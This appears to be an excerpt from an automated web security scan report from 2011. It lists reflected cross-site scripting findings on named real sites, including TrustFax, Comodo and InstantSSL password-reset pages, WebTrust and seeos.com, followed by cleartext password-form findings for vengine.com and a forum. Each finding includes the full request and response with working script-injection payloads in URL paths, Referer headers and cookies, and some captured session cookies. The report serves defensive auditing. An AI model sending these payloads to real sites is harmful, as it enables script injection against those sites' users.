GET /support.htmld2114--><img%20src%3da%20onerror%3dalert(1)>7075d3b5727 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 28666
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/support"
cache key = "/trustfax/content/support.htmld2114--><img src=a onerror=alert(1)>7075d3b5727.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "support"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.941"
-->
...[SNIP]...

1.42. http://www.trustfax.com/termsandconditions.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /termsandconditions.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 874a7--><img%20src%3da%20onerror%3dalert(1)>4adc5ca8d09 was submitted in the REST URL parameter 1. This input was echoed as 874a7--><img src=a onerror=alert(1)>4adc5ca8d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /termsandconditions.html874a7--><img%20src%3da%20onerror%3dalert(1)>4adc5ca8d09 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:40 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:40 GMT
Content-Length: 58156
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/termsandconditions"
cache key = "/trustfax/content/termsandconditions.html874a7--><img src=a onerror=alert(1)>4adc5ca8d09.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "termsandconditions"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.678"
-->
...[SNIP]...

1.43. http://www.trustfax.com/whytrustfax.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /whytrustfax.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload dd3bd--><img%20src%3da%20onerror%3dalert(1)>45b34d72443 was submitted in the REST URL parameter 1. This input was echoed as dd3bd--><img src=a onerror=alert(1)>45b34d72443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /whytrustfax.htmldd3bd--><img%20src%3da%20onerror%3dalert(1)>45b34d72443 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 10972
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Fax Email Send Fax Online - Trustfax"
handle = "/trustfax/content/whytrustfax"
cache key = "/trustfax/content/whytrustfax.htmldd3bd--><img src=a onerror=alert(1)>45b34d72443.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "whytrustfax"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.940"
-->
...[SNIP]...

1.44. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e739f<script>alert(1)</script>4647f9dbaca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=1082 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e739f<script>alert(1)</script>4647f9dbaca

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 09:40:04 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=e739f<script>alert(1)</script>4647f9dbaca]: please contact your practitioner.</body>
...[SNIP]...

1.45. https://secure.comodo.net/products/passwordResetRequest [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /products/passwordResetRequest

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83de1"><script>alert(1)</script>5fb9e3919804d0d3e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/passwordResetRequest?orderNumber=4654363456&loginName=aaa&emailAddress= HTTP/1.1
Host: secure.comodo.net
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=83de1"><script>alert(1)</script>5fb9e3919804d0d3e
Cache-Control: max-age=0
Origin: https://secure.comodo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:55:37 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 457
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4654363456</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = 'http://www.google.com/search?hl=en&q=83de1"><script>alert(1)</script>5fb9e3919804d0d3e'">
...[SNIP]...

1.46. https://secure.instantssl.com/products/passwordResetRequest [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/passwordResetRequest

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20e00"><script>alert(1)</script>5da064f00b0ed38bb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/passwordResetRequest?orderNumber=4543252345324523453245&loginName=&emailAddress=4353245 HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=20e00"><script>alert(1)</script>5da064f00b0ed38bb
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:14:02 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 469
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = 'http://www.google.com/search?hl=en&q=20e00"><script>alert(1)</script>5da064f00b0ed38bb'">
...[SNIP]...

1.47. https://secure.comodo.com/products/!PlaceOrder [errorURL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /products/!PlaceOrder

Issue detail

The value of the errorURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4151"><script>alert(1)</script>c83876de017faa9a0 was submitted in the errorURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/!PlaceOrder?errorURL=http%3A%2F%2Fhackerguardian.com%2Fpci-compliance%2Faddsupport%2Fssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0&_3_PPP=&_3_location=&_4_PPP=&_4_location=&isReturningCustomer=Y&loginName=324234234&loginPassword=324234234434&vatNumber=&vatStatus=2&currency=&region=&referrerURL=&entryURL=&ap=hackerguardian&successURL=http%3A%2F%2Fwww.hackerguardian.com%2F&_1_PPP=3460&iAgreeToTheTsAndCs=Y&contractSignerName=&contractSignerTitle=&contractSignerTelephoneNumber=&contractSignerEmailAddress=&Submit.x=72&Submit.y=16&Submit=Submit HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
Cache-Control: max-age=0
Origin: http://hackerguardian.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; PHPSESSID=f8719f41bb3d4af1231ab0216071d42d; WRUID=1666513654.2102610049; WRIgnore=true; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%2C%22banner%22%2C%22top%20menu%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.17.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 18 Sep 2011 11:20:45 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Location: http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0?errorCode=-4&errorItem=loginName&errorDetail=Password+cannot+contain+the+username.
Content-Length: 448
Cache-Control: max-age=-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0?errorCode=-4&errorItem=loginName&errorDetail=Password+cannot+contain+the+username.">
...[SNIP]...

1.48. http://www.seeos.com/ [uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /

Issue detail

The value of the uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d07"><script>alert(1)</script>77e368347ea was submitted in the uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?f HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.trustix.com/small/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=89d07"><script>alert(1)</script>77e368347ea

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:08:02 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Set-Cookie: uid=89d07%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e368347ea; expires=Mon, 19-Sep-2011 12:08:02 GMT
Vary: Accept-Encoding
Content-Length: 865
Connection: close
Content-Type: text/html

<html>
<head>
<title>seeos.com: The Leading See OS Site on the Net</title>
</head>
<frameset cols="1,*,1" border=0>
<frame name="top" src="tg.php?uid=89d07"><script>alert(1)</script>77e368347ea&src=&cat=travel&kw=See+OS&sc=travel" scrolling=no frameborder=0 noresize framespacing=0 marginwidth=0 marginheight=0>
...[SNIP]...

2. Cleartext submission of password
There are 23 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://forum.psoft.net/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.psoft.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: forum.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:33:23 GMT
Server: Apache
Set-Cookie: bb_lastactivity=0; expires=Mon, 17-Sep-2012 12:33:23 GMT; path=/; domain=.psoft.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Content-Length: 99991
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

2.2. http://www.vengine.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.3. http://www.vengine.com/corporate/about.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.4. http://www.vengine.com/corporate/contact.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.5. http://www.vengine.com/products/best_practices.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/best_practices.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.6. http://www.vengine.com/products/features.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/features.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.7. http://www.vengine.com/products/free_tools.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/free_tools.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.8. http://www.vengine.com/products/overview.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/overview.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
